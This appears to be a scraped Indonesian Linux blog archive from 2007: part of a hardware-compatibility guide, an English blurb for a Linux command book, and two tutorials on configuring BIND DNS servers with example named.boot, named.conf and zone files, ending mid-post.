• Kartu grafis Matrox yang didukung oleh Linux adalah: Millenium I, Millenium II, Mystique, G100, G200 serta G400. Dukungan 3D Matrox juga cukup baik.
• Seluruh kartu grafis yang berchipset NVIDIA, di antaranya adalah: TNT, TNT2, TNT2 Ultra, TNT2 Vanta, dan GeForce. Namun NVIDIA menyatakan hanya akan memberikan driver tanpa source untuk DRI (Direct Rendering Interface) pada XFree86 4.0. Hal tersebut akan menyulitkan untuk menjalankan aplikasi-aplikasi 3D seperti game Quake 3 Arena dan sejenisnya.
• Kartu grafis Intel i740 dan i840 didukung oleh XFree86. Namun i840 membutuhkan driver kernel tambahan, kemungkinan besar sudah akan ada pada kernel versi 2.2.15.
• Chipset Neomagic NeoMagic NM2070, NM2090, NM2093, NM2097, NM2160 dan NM2200 didukung oleh XFree86, chipset ini umumnya digunakan oleh beberapa jenis komputer notebook.
• Hampir seluruh chipset S3 didukung oleh XFree86, seperti halnya: S3 8xx dan 9xx, Trio32, seluruh jenis Trio64 dan Aurora64, seluruh jenis VIRGE dan Savage.
• Seluruh chipset ATI Mach 8, Mach 32, Mach 64 serta Rage128 didukung oleh XFree86.
Di atas hanyalah kartu video yang populer di pasaran saat ini. Untuk daftar lengkapnya silakan lihat http://www.xfree86.org/4.0/Status.html.
Dapat dilihat bahwa hampir seluruh kartu grafis yang tersedia di pasaran didukung oleh XFree86. Namun untuk dapat menikmati game 3D seperti Quake 3 Arena dianjurkan untuk memiliki kartu grafis buatan 3DFX atau Matrox.
Kartu Suara
Kebanyakan kartu suara yang beredar di pasaran telah didukung oleh Linux dengan beberapa pengecualian. Hindari produk-produk yang berchipset Yamaha terutama YMF 720, YMF 740 dan YMF 744, Yamaha telah menolak untuk mengeluarkan spesifikasi teknis yang diperlukan untuk membuat driver. Selain itu, kartu suara buatan Aureal juga belum dibuat drivernya. Kartu suara lainnya yang belum ada drivernya adalah: IBM MWave, Yamaha berbasis PCI, Trident 9753 Wave dan USB Sound. Khusus untuk USB Sound seperti buatan Philips serta Altec Lansing, pembuatan driver untuk hardware tersebut baru dimulai pada awal tahun ini.
Kartu suara populer yang didukung oleh Linux antara lain adalah:
• Seluruh kartu suara buatan Creative Labs seperti SoundBlaster Live!, Live! Value dan Live! Platinum, dan juga seluruh generasi sebelumnya dari SoundBlaster.
• Seluruh kartu suara ESS Technologies dan Ensoniq, yang berchipset ESS 1xxx dan Maestro.
• S3 Sonicvibes PCI
• Logitech Soundman 16, Soundman Wave dan Soundman Games.
• AcerMagic S23
Daftar lengkap kartu suara yang didukung oleh Linux dapat dilihat pada http://www.linux.org.uk/OSS/ (OSS/Free, untuk kernel sampai 2.4), dan http://www.alsa-project.org/~goemon/ (ALSA, untuk kernel 2.5 dan selanjutnya). Anda juga dapat menggunakan driver komersil OSS jika anda menggunakan hardware yang spesifikasinya tidak terbuka, silakan lihat http://www.opensound.org.
Media Penyimpanan
Seluruh jenis harddisk dan CDROM dengan interface IDE/ATA/ATAPI atau SCSI didukung oleh Linux, termasuk interface IDE dengan 4 drive pada satu port IDE. Linux juga mendukung media penyimpanan yang tidak umum seperti protokol IDE melalui port paralel seperti buatan ATEN, Microsolutions, DataStor, FIT, Shuttle, Freecom, dan OnSpec.
Linux juga mendukung interface CDROM lama yang bukan IDE atau SCSI seperti Sony, Aztech, Mitsumi dan lainnya.
IOMEGA Zip Drive dan Jaz Drive juga didukung oleh Linux, baik versi baru ataupun versi lama. Versi paralel port, IDE maupun SCSI didukung penuh oleh Linux. Untuk keterangan lebih lanjut mengenai piranti penyimpanan yang menggunakan port paralel, silakan lihat http://www.torque.net/parport/paride.html.
Hampir seluruh CD Writer baik CD-R maupun CD-RW yang tersedia di pasaran didukung oleh Linux seperti buatan Plextor, Sony, Creative, Iomega, Philips, Panasonic, Pinnacle, Samsung, Sanyo, serta Yamaha, baik yang memiliki interface paralel port, SCSI maupun IDE. Untuk daftar lengkap mengenai CD writer yang didukung oleh Linux silakan lihat http://www.guug.de:8080/cgi-bin/winni/lsc.pl.
Device Input
Hampir seluruh device input yang sering kita gunakan sehari-hari didukung oleh Linux, di antaranya adalah: seluruh jenis keyboard, alat penunjuk seperti mouse, trackball, touchpad, trackpoint serta tablet yang memiliki interface PS/2, serial maupun Busmouse didukung oleh Linux.
Selain itu Linux juga mendukung hampir seluruh tipe Joystick seperti joystick standard, Gravis, Logitech Wingman, Microsoft SideWinder, Thrustmaster, serta joystick/gamepad dari NES, SNES, Playstation, dan Sega.
Pada saat ini device input dengan interface USB yang didukung Linux hanyalah keyboard dan mouse. Dukungan penuh untuk piranti USB lainnya baru akan muncul pada kernel versi 2.4.
Jaringan
Linux mendukung hampir semua kartu jaringan ethernet, fast ethernet serta gigabit ethernet. Kemungkinan besar, produk yang anda beli di pasaran sudah didukung oleh Linux. Beberapa jenis yang TIDAK didukung Linux adalah: Intel EtherExpress Pro 100A, Matrox Multiport PCI Switch, Essential Communication Gigabit Ethernet, Sun Gigabit Ethernet. Kartu Intel Gigabit Ethernet akan didukung oleh Intel dengan driver yang closed source ( http://support.intel.com/support/network/adapter/1000/software.htm).
Sebagian besar kartu jaringan ethernet sudah didukung Linux. Yang harus diperhatikan adalah beberapa merk populer yang drivernya belum dimasukkan ke source kernel Linux: D-Link DFE530-TX (bukan DE530) menggunakan driver VIA Rhine, dan Compex RL100ATX menggunakan driver Winbond 840. Keduanya bisa didownload dari http://cesdis.gsfc.nasa.gov/linux/drivers/ethercard.html.
Daftar lengkap driver-driver ethernet yang didukung Linux dapat dilihat dari homepage NASA di http://cesdis.gsfc.nasa.gov/linux/drivers/.
Printer
Sebagian besar printer yang umum di pasaran telah didukung oleh Linux. Di bawah ini adalah beberapa printer HP, Canon dan Epson yang dapat digunakan bersama Linux:
• HP DeskJet 400, 420C, 510, 520, 540, 550C, 560C, 600, 610C, 610CL, 612C, 660C, 670C, 672C, 682C, 690C, 692C, 694C, 697C, 812C, 850C, 855C, 890C, LaserJet 4 Plus, 4050N, 4L, 4M, 4ML, 4P, 5, 5000, 5L, 5M, 5MP, 5P, LaserJet 6, 6MP, 8000, 8100. Yang TIDAK didukung atau memiliki dukungan yang buruk adalah: DeskJet 1000C, 710C, 712C, 720C, 722C, 820C, LaserJet 6L.
• Canon BJ-10e, BJ-20, BJ-200, BJ-330, BJ-5, BJC-210, BJC-250, BJC-4000, BJC-4100, BJC-4200, BJC-4300, BJC-4400, BJC-600, BJC-610, BJC-620, BJC-70, BJC-800, GP335/405, LBP-1260, LBP-1760, LBP-4+, LBP-4U, LBP-8A1, LIPS III, LIPS-III, bjc5000. Yang TIDAK didukung atau memiliki dukungan yang buruk adalah: BJC-4550, BJC-6000, BJC-7000, BJC-7100, BJC-5000, BJC-5100, LBP-430, LBP-460, LBP-660.
• Epson Stylus Color 1520, 400, 440, 460, 500, 600, 640, 800, 850, I, II, IIs, PRO, XL. Yang TIDAK didukung atau memiliki dukungan yang buruk adalah: Stylus Color 300, 900, 700, 750, Stylus Photo EX.
Selain itu, seluruh jenis printer yang mendukung PostScript didukung oleh Linux.
Daftar lengkap printer yang didukung oleh Linux dapat anda lihat pada http://www.picante.com/~gtaylor/pht/printer_list.cgi.
Scanner
Dukungan scanner pada Linux diberikan oleh program SANE (http://www.mostang.com/sane/). Beberapa scanner yang didukung oleh SANE adalah:
• Artec AT3, A6000C, A6000C Plus, AT6, AT12, AM12S.
• HP Scanjet Plus, IIp, IIc, IIcx, 3c, 3p, 4c, 4p, 4100c, 5p, 5100c, 5200c, 6100c, 6200c, 6250c, 6300c, 6350c.
• UMAX 600S, 610S, 1200S, 1220S, 2200W, 2400S. UMAX versi paralel dan USB TIDAK didukung.
• Beberapa scanner Epson dan Canon didukung, namun driver untuk scanner-scanner tersebut masih versi alpha.
Untuk informasi lengkap mengenai scanner yang didukung oleh SANE, silakan lihat daftar lengkapnya di http://www.mostang.com/sane/sane-backends.html
TV/Radio Tuner
Linux juga mendukung tuner TV/Radio sehingga anda dapat mendengarkan radio atau menonton TV pada tampilan Linux anda. TV/Radio tuner yang paling populer adalah yang memiliki chipset Brooktree Bt848 atau Bt878, lihatlah pada kartu tuner yang bersangkutan. Seluruh tuner yang memiliki chipset tersebut didukung oleh Linux seperti Hauppauge WinTV atau Avermedia. Chipset lainnya yang didukung Linux adalah AIMSLab Radiotrack, Aztech/Packard Bell Radio, ADS Channelsurfer, Miro, Zoran, Zoltrix, serta kamera QuickCam.
Universal Serial Bus (USB)
Saat ini mulai banyak bermunculan hardware-hardware yang menggunakan bus USB. Dukungan penuh Linux untuk USB baru dimulai pada kernel versi 2.3 dan 2.4. Pada kernel 2.2.14 Linux baru mendukung device USB keyboard, mouse dan sound saja. Dukungan USB untuk Linux dapat anda lihat pada http://www.qbik.ch/usb/devices/.
Jika anda telah memiliki hardware yang tidak didukung oleh Linux, anda dapat melakukan hal-hal di bawah ini:
• Jika vendor hardware anda tidak membuka spesifikasi teknis hardware yang anda miliki, anda dapat mengusulkan kepada vendor tersebut untuk membuka spesifikasi teknisnya. Dahulu Creative Labs tidak membuka spesifikasi dari SoundBlaster Live!, namun karena dorongan publik, Creative akhirnya membuka spesifikasi teknisnya, dan bahkan membantu membuatkan driver yang opensource di http://opensource.creative.com.
• Anda dapat menukarkan hardware anda dengan hardware lain yang didukung oleh Linux.
• Jika anda mampu, anda dapat membuat driver untuk hardware anda, atau setidaknya membantu pembuat driver. Sebagian besar driver hardware untuk Linux tidak ditulis oleh vendor hardware yang bersangkutan, namun ditulis oleh komunitas Linux.

A Practical Guide to Linux(R) Commands, Editors, and Shell Programming

2007-07-28T13:31:00.000+07:00

To be truly productive with Linux, you need to thoroughly master the shells and the command line. Until now, you had to buy two books to gain that mastery: a tutorial on fundamental Linux concepts and techniques, plus a separate reference. Worse, most Linux references offer little more than prettied-up man pages. Now, there’s a far better solution. Renowned Linux expert Mark Sobell has brought together comprehensive, insightful guidance on the tools system administrators, developers, and power users need most, and an outstanding day-to-day reference, both in the same book.

This book is 100 percent distribution and release agnostic: You can use it on any Linux system, now and for years to come. What’s more, it’s packed with hundreds of high-quality examples: better examples than you’ll find in any other Linux guidebook. This is Linux from the ground up: the clearest explanations and most useful knowledge about everything from filesystems to shells, editors to utilities, and programming tools to regular expressions. And when you need instant answers, you’ll constantly turn to Sobell’s comprehensive command reference section—organized and tabbed for easy, fast access!

Don’t settle for yesterday’s Linux guidebook. Get the one book that meets today’s challenges—and tomorrow’s!

A Practical Guide to Linux® Commands, Editors, and Shell Programming is the most useful, most comprehensive Linux tutorial and reference you can find. It’s the only book to deliver
Better, more realistic examples covering tasks you’ll actually need to perform
Deeper insight, based on Sobell’s immense knowledge of every Linux nook and cranny
More practical explanations of more than eighty core utilities, from aspell to xargs
Techniques for implementing secure communications using ssh and scp—plus dozens of tips for making your system more secure
A superior introduction to the Linux programming environment, including make, gcc, gdb, CVS, and much more
Expert guidance on basic and advanced shell programming using bash and tcsh
Tips and tricks for customizing the shell and using it interactively from the command line
Thorough guides to vim and emacs, designed to help you get productive fast and maximize your editing efficiency
Dozens of exercises to help you practice and gain confidence
Instructions for using Apt, yum, and BitTorrent for keeping your system up to date automatically
And much more, including coverage of gawk, sed, find, sort, bzip2, and regular expressions

Mengkonfigurasi DNS Server

2007-07-13T16:15:00.000+07:00

Membuat Primary dan Secondary DNS Server
Joko Yuliantoro & Onno W. Purbo
Computer Network Research Group (CNRG)
Institut Teknologi Bandung (ITB)

Untuk beroperasinya sebuah jaringan komputer Internet, sebetulnya pengalamatan sebuah komputer dilakukan menggunakan angka yang dikenal sebagai Internet Protocol (IP) Address yang terdiri dari 32 bit. Tentunya akan sukar bagi manusia / user untuk mengingat sekian juta komputer di seluruh Internet. Untuk itu dikembangkan penamaan mesin yang lebih manusiawi menggunakan konsep Domain Name System (DNS). Pada tulisan ini kami akan mencoba menjelaskan cara mensetup DNS Server di mesin dengan OS UNIX. Kemampuan ini akan sangat dibutuhkan bila sebuah institusi /perusahaan ingin mempunyai nama hostname sendiri di Internet.
Domain Name System adalah salah satu jenis sistem yang melayani permintaan pemetaan IP Address ke FQDN ( Fully Qualified Domain Name ) dan dari FQDN ke IP Address. FQDN lebih mudah untuk diingat oleh manusia daripada IP Address. Sebagai contoh, sebuah komputer memiliki IP Address 167.205.22.114 dan memiliki FQDN “nic.itb.ac.id”. Nama “nic.itb.ac.id” tentunya lebih mudah diingat daripada nomor IP Address di atas. Apalagi setelah lahirnya konsep IP Version 6 yang memiliki 6 segment untuk setiap komputer sehingga nomor IP Address menjadi semakin panjang dan lebih sulit untuk diingat. Selain itu, DNS juga menyediakan layanan mail routing, informasi mengenai hardware, sistem operasi yang dijalankan, dan aplikasi jaringan yang ditangani oleh host tersebut.
Pada sistem operasi UNIX, DNS diimplementasikan dengan menggunakan software Berkeley Internet Name Domain (BIND). BIND ini memiliki dua sisi, yaitu sisi client dan sisi server. Sisi client disebut resolver. Resolver ini bertugas membangkitkan pertanyaan mengenai informasi domain name yang dikirimkan kepada sisi server. Sisi server BIND ini adalah sebuah daemon yang disebut named. Ia yang akan menjawab query-query dari resolver yang diberikan kepadanya.
Pada saat BIND dijalankan, ia memiliki 4 modus operasi, yaitu :
• Resolver-only
Komputer hanya membangkitkan query informasi domain name kepada sebuah DNS server dan tidak menjalankan fungsi DNS server.
• Caching-only
Komputer menjalankan fungsi name server tetapi tidak memiliki database DNS server. Ia hanya mempelajari jawaban-jawaban query yang diberikan oleh remote DNS server dan menyimpannya dalam memory. Data-data dalam memory tersebut akan digunakan untuk menjawab query selanjutnya yang diberikan kepadanya.
• Primary server
Komputer menjalankan fungsi name server berdasarkan database yang dimilikinya. Database ini dibangun oleh administrator DNS. Server ini menjadi authoritative source bagi domain tertentu.
• Secondary server
Komputer menjalankan fungsi name server berdasarkan database yang diambil dari primary server. Proses pengambilan file database ini sering disebut zone file transfer. Ia juga menjadi authoritative source bagi domain tersebut.

Resolver-only
Saat berada dalam modus resolver-only, BIND akan mencari file /etc/resolv.conf (pada UNIX umum) dan membaca konfigurasi yang tertera dalam file tersebut. Jika BIND tidak menemukan file tersebut maka ia akan menggunakan konfigurasi standar yang dimilikinya.
Bentuk dasar sintaks pada file /etc/resolv.conf adalah sebagai berikut :
domain name
nameserver address
[nameserver address]
domain menyatakan default domain seperti yang didefinisikan oleh entry name. Jika ada penulisan nama host yang tidak mengandung tanda baca titik maka resolver akan menambahkan entry name di belakang nama host tersebut. Sebagai contoh, jika Anda menuliskan host name mail saja dan entry name berisi ptn.co.id maka resolver akan menggunakan nama mail.ptn.co.id.
nameserver menyatakan server mana yang harus dihubungi jika ada query dari resolver mengenai domain di atas. Apabila server tersebut tidak bisa dihubungi, server selanjutnya menjadi sasaran lemparan query.

Contoh listing file /etc/resolv.conf :

# Resolver configuration file
domain ptn.co.id
# Server terdekat adalah mumet.ptn.co.id, IP 169.98.3.1
nameserver 169.98.3.2
# Gagal ??? Coba server kedua : nggliyeng.ptn.co.id, IP 169.98.2.15
nameserver 169.98.2.15
# Gagal lagi ??? Server ketiga : ngeh.ptn.co.id, IP 169.98.1.2
nameserver 169.98.1.2

Ketiga modus selanjutnya dapat dijalankan secara bersamaan atau berdiri sendiri pada sebuah komputer yang menjadi DNS server. Pengaturan modus ini dilakukan pada konfigurasi daemon named. File-file penting yang menjadi acuan bagi named untuk beroperasi adalah named.boot, data_cache, data_domain, dan data_reverse. named.boot adalah file yang berisi boot script bagi DNS server. data_cache adalah file yang berisi DNS root server. data_domain adalah file yang berisi pemetaan dari FQDN ke IP Address dan data terlengkap dari domain yang bersangkutan. data_reverse adalah file yang berisi data mengenai pemetaan IP Address ke FQDN. Pada sistem operasi UNIX, file-file tersebut terletak di direktori /etc/namedb. Direktori tersebut menjadi default bagi named.
File konfigurasi yang paling penting bagi named adalah file /etc/namedb/named.boot. File ini berisikan perintah-perintah yang mendefinisikan fungsi named sebagai caching-only server, primary server, atau secondary server.

Caching-only
Jika kita ingin mengatur agar named hanya beroperasi pada modus caching-only maka file named.boot hanya berisi perintah cache diikuti nama file yang berisi server-server utama yang menjadi tempat melemparkan query.
Berikut ini contoh file named.boot dimana kita mengatur named agar beroperasi pada modus caching-only :

; file named.boot
;
; mendefinisikan default directory
directory /etc/namedb
;
; menjadi caching-only server
cache data_cache
;

Primary Server
Jika kita menghendaki named pada komputer kita menjadi primary server, kita tambahkan kata primary diikuti domain yang dipegang oleh named tersebut dan diakhiri dengan nama file yang berisi database domain tersebut..
Sebagai contoh, komputer kita menjadi primary server untuk domain ptn.co.id dengan file data_domain berjudul ptn. Sebaiknya, sebuah primary server juga menjalankan fungsi caching-only. Hal ini untuk menambah kehandalan server dalam menjawab query-query yang cukup rumit. File named.boot akan berisi sebagai berikut :

; file named.boot
;
; mendefinisikan default directory
directory /etc/namedb
;
; menjadi caching-only server
cache data_cache
;
; menjadi primary server atas domain ptn.co.id
primary ptn.co.id ptn
;
; menjadi primary server atas pemetaan IP Address 169.98.1.x ke FQDN
primary 1.98.169.IN-ADDR.ARPA rev_169.98.1.x
;

Jika komputer kita juga menjadi primary server atas pemetaan IP Address 169.98.1.x ke FQDN maka kita tambahkan entry yang terakhir.

Secondary Server
Secondary server adalah DNS server yang menggunakan database domain yang ditransfer dari primary server. Untuk mengatur server agar menjadi secondary bagi domain tertentu, kita tambahkan kata secondary diikuti dengan domain yang dipegang, kemudian diikuti oleh IP Address primary server dan diakhiri dengan nama file databasenya.
Sebagai contoh, komputer kita akan bertindak sebagai secondary server untuk domain pts.ac.id. Primary server domain dipegang oleh server dns.pts.ac.id dengan nomor IP Address 190.21.85.2. Kita edit file named.boot sehingga menjadi seperti berikut :

; file named.boot
;
; mendefinisikan default directory
directory /etc/namedb
;
; menjadi caching-only server
cache data_cache
;
; menjadi primary server atas domain ptn.co.id
primary ptn.co.id ptn
;
; menjadi secondary server atas domain pts.ac.id dari dns.pts.ac.id
secondary pts.ac.id 190.21.85.2 sec_pts
;
; menjadi primary server atas pemetaan IP Address 169.98.1.x ke FQDN
primary 1.98.169.IN-ADDR.ARPA rev/rev_169.98.1.x
;
; menjadi secondary server atas pemetaan IP Address 190.21.85.x ke FQDN
secondary 85.21.190.IN-ADDR.ARPA 190.21.85.2 rev/sec_190.21.85.x

Jika kita juga menjadi secondary server atas pemetaan IP Address 190.21.85.x ke FQDN dari server dns.pts.ac.id kita tambahkan entry yang terakhir.

Langkah selanjutnya adalah membuat file data_domain dan data_reverse (seperti file ptn dan rev/rev_169.98.1.x) yang akan dibahas pada artikel mendatang.

Daftar Pustaka
• RFC 1034, “Domain Names - Concepts and Facilities”
• RFC 1035, “Domain Names - Implementation and Spesification”

DNS (Domain Name Service)

2007-07-13T15:42:00.000+07:00

DNS (Domain Name Service)

DNS bertugas meresolusi IP ke nama alamat dan sebaliknya dari nama alamat ke nomor IP. Beberapa cara untuk meresolusi alamat Internet antara lain :
1.Dengan membaca file lokal /etc/hosts
2.Dengan memanfaatkan pelayanan DNS Server
3.Dengan memanfaatkan pelayanan NIS (Network Information System) Server

File /etc/hosts

File ini berisi pengalamatan name-to-ip yang bisa digunakan juga untuk resolusi ip-to-name. Dengan memiliki file ini, mesin Linux dapat menggunakan nama yang lebih mudah diingat untuk memanggil atau mengakses mesin lain dalam jaringan, daripada harus menggunakan nomor IP. File ini amat sederhana isinya seperti dalam contoh berikut :
[root@digital modul]# cat /etc/hosts
192.168.0.6 digital.adhyaksa.net digital
127.0.0.1 localhost.localdomain localhost
Keterangan :
Kolom 1 adalah nomor IP
Kolom 2 adalah FQDN (Fully Qualified Domain Name)
Kolom 3 adalah nama host

File /etc/hosts diatas menunjukkan bahwa nama digital.adhyaksa.net dan digital dipetakan ke nomor IP 192.168.0.6, nama localhost.localdomain dan localhost dipetakan ke nomor IP 127.0.0.1.

Kelemahan menggunakan file /etc/hosts :
Semua mesin atau host dalam jaringan harus memiliki file ini identik isinya satu sama lain
Setiap kali ada perubahan nama host atau nomor IP, maka seluruh file di seluruh host harus di-update isinya
Sangat tidak praktis untuk jaringan dengan host banyak

DNS Server

Menggunakan DNS tidak seperti menggunakan file /etc/hosts. DNS bersifat client-server sehingga administrasi cukup dilakukan di sisi server saja, sedangkan pada client cukup dikonfigurasi 1 kali yaitu memberi cara agar mesin client dapat menghubungi DNS server.
Dalam jaringan Internet, DNS server diseluruh dunia saling bekerjasama dalam rangka meresolusi alamat Internet. Network yang lebih besar memiliki DNS server yang menjadi sumber data bagi DNS server pada network dibawahnya. Kerjasama yang dijalin ini dapat digambarkan pada contoh kasus berikut :
"Proses penampilan gambar atau isi sebuah situs pada browser Netscape yang digunakan seorang pengguna Linux dengan akses dial-up ke sebuah ISP di Indonesia misalnya comnet.net.id. Saat itu DNS client mengarah pada DNS server dengan IP 202.150.128.64 dan IP 202.150.128.65."
Perjalanan yang ditempuh untuk meresolusi IP secara umum dapat dijelaskan seperti berikut :
1.Browser diarahkan ke situs http://mail.ngoprek.org
2.DNS client menghubungi DNS server agar mendapatkan IP domain mail.ngoprek.org
3.DNS server mencari data mengenai mail.ngoprek.org dengan cara menghubungi DNS server tertinggi yaitu . (dot) atau root server
4.DNS root server menghubungi DNS server org
5.DNS server org menghubungi DNS server ngoprek.org
6.DNS server ngoprek.org mengenali subdomain mail.ngoprek.org dan berhasil meresolusi mail.ngoprek.org ke IP 202.135.0.9
7.IP tersebut dikirimkan kembali ke DNS client kemudian diberikan ke browser
8.Browser mengarahkan langsung langsung ke IP 202.135.0.9 untuk menghubungi web server pada IP tersebut

DNS server terdiri dari 2 jenis server, yaitu :
Primary Name Server (PNS) adalah DNS server yang bertanggung jawab atas resolusi domain dan subdomain yang dikelolanya
Secondary Name Server (SNS) adalah DNS server yang secara hirarki setara dengan PNS namun data-data domain dan subdomain diperoleh dengan cara menyalin dari PNS

DNS Client

DNS client bertugas untuk menentukan DNS server yang digunakan untuk meresolusi alamat Internet yang perlu dihubungi oleh program dalam mesin client. Dalam sistem Linux, DNS client merupakan file biasa seperti /etc/hosts bernama /etc/resolv.conf, namun dengan isi berbeda seperti contoh berikut :
[root@digital /root]# ls -l /etc/resolv.conf
-rw-r--r-- 1 root root 66 Dec 3 10:23 /etc/resolv.conf
[root@digital /root]# cat /etc/resolv.conf
search adhyaksa.net
nameserver 192.168.0.4
nameserver 192.168.0.1

Pada contoh diatas PNS yang dihubungi adalah IP 192.168.0.4 dan SNS yang dihubungi adalah IP 192.168.0.1. Tag search berisi sebuah nama yang digunakan sebagai default domain bila resolusi sebuah nama gagal.

Paket BIND 8.2.2

Program DNS yang digunakan oleh Linux RedHat 6.2 adalah BIND 8.2.2 yang terdiri dari file-file rpm sebagai berikut :
bind-8.2.2_P5-9.i386.rpm
bind-utils-8.2.2_P5-9.i386.rpm
bind-devel-8.2.2_P5-9.i386.rpm
caching-nameserver-6.2-2.noarch.rpm

Gunakan rpm -ivh untuk menginstal bind pada mesin server Linux.

Konfigurasi Name Server

PNS membaca data-data resolusi pada sekumpulan file konfigurasi yang terdapat pada komputer lokal. File-file tersebut antara lain :
/etc/named.conf
Berisi konfigurasi DNS server BIND 8.x.x.
[root@digital /root]# cat /etc/named.conf
// generated by named-bootconf.pl
options {
directory "/var/named";
/*
* If there is a firewall between you and nameservers you want
* to talk to, you might need to uncomment the query-source
* directive below. Previous versions of BIND always asked
* questions using port 53, but BIND 8.1 uses an unprivileged
* port by default.
*/
// query-source address * port 53;
};
//
// a caching only nameserver config
//
zone "." {
type hint;
file "named.ca";
};
zone "0.0.127.in-addr.arpa" {
type master;
file "named.local";
};

/var/named/*
Direktori /var/named berisi file-file zona yang namanya bersesuaian dengan tag file pada bracket zone dalam /etc/named.conf
[root@digital /root]# ls -l /var/named
total 4
-rw-r--r-- 1 root root 2769 Feb 4 2000 named.ca
-rw-r--r-- 1 root root 422 Feb 4 2000 named.local

[root@digital /root]# cat /var/named/named.local
@ IN SOA localhost. root.localhost. (
1997022700 ; Serial
28800 ; Refresh
14400 ; Retry
3600000 ; Expire
86400 ) ; Minimum
IN NS localhost.

1 IN PTR localhost.

[root@digital /root]# cat /var/named/named.ca
; This file holds the information on root name servers needed to
; initialize cache of Internet domain name servers
; (e.g. reference this file in the "cache . "
; configuration file of BIND domain name servers).
;
; This file is made available by InterNIC registration services
; under anonymous FTP as
; file /domain/named.root
; on server FTP.RS.INTERNIC.NET
; -OR- under Gopher at RS.INTERNIC.NET
; under menu InterNIC Registration Services (NSI)
; submenu InterNIC Registration Archives
; file named.root
;
; last update: Aug 22, 1997
; related version of root zone: 1997082200
;
;
; formerly NS.INTERNIC.NET
;
. 3600000 IN NS A.ROOT-SERVERS.NET.
A.ROOT-SERVERS.NET. 3600000 A 198.41.0.4
;
; formerly NS1.ISI.EDU
;
. 3600000 NS B.ROOT-SERVERS.NET.
B.ROOT-SERVERS.NET. 3600000 A 128.9.0.107
;
; formerly C.PSI.NET
;
. 3600000 NS C.ROOT-SERVERS.NET.
C.ROOT-SERVERS.NET. 3600000 A 192.33.4.12
;
; formerly TERP.UMD.EDU
;
. 3600000 NS D.ROOT-SERVERS.NET.
D.ROOT-SERVERS.NET. 3600000 A 128.8.10.90
;
; formerly NS.NASA.GOV
;
. 3600000 NS E.ROOT-SERVERS.NET.
E.ROOT-SERVERS.NET. 3600000 A 192.203.230.10
;
; formerly NS.ISC.ORG
;
. 3600000 NS F.ROOT-SERVERS.NET.
F.ROOT-SERVERS.NET. 3600000 A 192.5.5.241
;
; formerly NS.NIC.DDN.MIL
;
. 3600000 NS G.ROOT-SERVERS.NET.
G.ROOT-SERVERS.NET. 3600000 A 192.112.36.4
;
; formerly AOS.ARL.ARMY.MIL
;
. 3600000 NS H.ROOT-SERVERS.NET.
H.ROOT-SERVERS.NET. 3600000 A 128.63.2.53
;
; formerly NIC.NORDU.NET
;
. 3600000 NS I.ROOT-SERVERS.NET.
I.ROOT-SERVERS.NET. 3600000 A 192.36.148.17
;
; temporarily housed at NSI (InterNIC)
;
. 3600000 NS J.ROOT-SERVERS.NET.
J.ROOT-SERVERS.NET. 3600000 A 198.41.0.10
;
; housed in LINX, operated by RIPE NCC
;
. 3600000 NS K.ROOT-SERVERS.NET.
K.ROOT-SERVERS.NET. 3600000 A 193.0.14.129
;
; temporarily housed at ISI (IANA)
;
. 3600000 NS L.ROOT-SERVERS.NET.
L.ROOT-SERVERS.NET. 3600000 A 198.32.64.12
;
; housed in Japan, operated by WIDE
;
. 3600000 NS M.ROOT-SERVERS.NET.
M.ROOT-SERVERS.NET. 3600000 A 202.12.27.33
; End of File

Sedangkan SNS membaca data copy dari PNS melalui sebuah mekanisme transfer data melalui protokol DNS. Data yang dicopy disimpan dalam bentuk file zona yang diletakkan di direktori /var/named pada mesin SNS.

Format /etc/named.conf dapat dijelaskan sebagai berikut :
Terdiri dari 2 bracket dasar yaitu :
Blok Options
Berisi kompulan opsi-opsi global untuk bind 8.x.x, gunakan man named.conf untuk mendapatkan informasi lebih detil mengenai opsi-opsi yang tersedia.
Blok Zone
Berisi tag-tag yang digunakan untuk menentukan tipe server untuk 1 domain atau subdomain tertentu dan file zona yang berisi konfigurasi 1 domain atau subdomain tertentu.
Bila kita bertujuan membuat zona file untuk pemetaan NAME-TO-IP gunakan nama domain sebagai nama zona.
Bila kita bertujuan membuat zona file untuk pemetaan IP-TO-NAME gunakan nama domain dengan format sebagai berikut :
Contoh :
IP-TO-NAME untuk network 192.168.0, nama zona file ditulis 0.168.192.in-addr.arpa
IP-TO-NAME untuk network 202.150.128, nama zona file ditulis 128.150.202..in-addr.arpa

Format file zona dapat dijelaskan sebagai berikut :
Terdiri dari kumpulan record yang berisikan keterangan yang detil tentang sebuah domain atau subdomain. Record-record tersebut antara lain :
SOA
Start Of Authority mengawali file zona, berisi data-data waktu sebuah domain atau subdomain. Lebih jelasnya seperti berikut :
@ IN SOA localhost. root.localhost. (
1997022700 ; Serial
28800 ; Refresh
14400 ; Retry
3600000 ; Expire
86400 ) ; Minimum
Keterangan :
@ Merupakan shortcut yang menyatakan nama domain yang bersesuaian dengan zona ini
IN Merupakan kata kunci protokol INTERNET
SOA Menyatakan nama record SOA
localhost. Name Server yang menangani domain ini
root.localhost Menyatakan kontak administratif berupa email administrator, dalam hal ini root@localhost
( dan ) Bila ditulis lebih dari 1 baris
Serial Nomor urut yang dibangkitkan setiap kali ada perubahan konfigurasi
Refresh Interval yang digunakan SNS untuk mengontak PNS
Retry Waktu tunggu yang digunakan oleh SNS bila PNS down atau crash
Expire Masa berlaku zona untuk SNS tanpa harus melakukan refresh pada PNS jika PNS down
Minimum Nilai default untuk masa berlaku data yang disimpan dalam cache

NS
Menyatakan Name Server yang berlaku.
@ IN NS localhost.

A
Menyatakan Address Internet atau nomor IP
@ IN A 192.168.0.1
digital IN A 192.168.0.4

CNAME
Menyatakan nama Alias (Canonical Name)
mail IN CNAME digital.
Berarti : mail adalah nama alias dari digital

PTR
Menyatakan pointer, yaitu reversed-address
digital IN A 192.168.0.4
4.0.168.192.in-addr.arpa. IN PTR digital.
Berarti : IP 192.168.0.4 dipetakan ke nama domain atau subdomain digital.

MX
Menyatakan Mail Exchanger, digunakan untuk menunjuk mail server yang menangani email domain atau subdomain ini
digital IN MX 0 super.adhyaksa.net.
IN MX 10 drutz.adhyaksa.net.
Berarti : email untuk digital.adhyaksa.net akan diterima oleh mail server dengan prioritas lebih tinggi (super.adhyaksa.net) dimana angka yang lebih kecil merupakan prioritas yang lebih tinggi. Angka yang dimaksud adalah kolom ke-3 pada MX. Mail server pada prioritas selanjutnya akan dihubungi apabila mail server sebelumnya down atau crash.

HINFO
Menyatakan Hardware Information
digital IN HINFO "Intel PIII 550 - Linux Redhat 6.2"

TXT
Menyatakan infomasi umum
digital IN TXT "Server location : Sukapura - Bandung"

Contoh kasus :
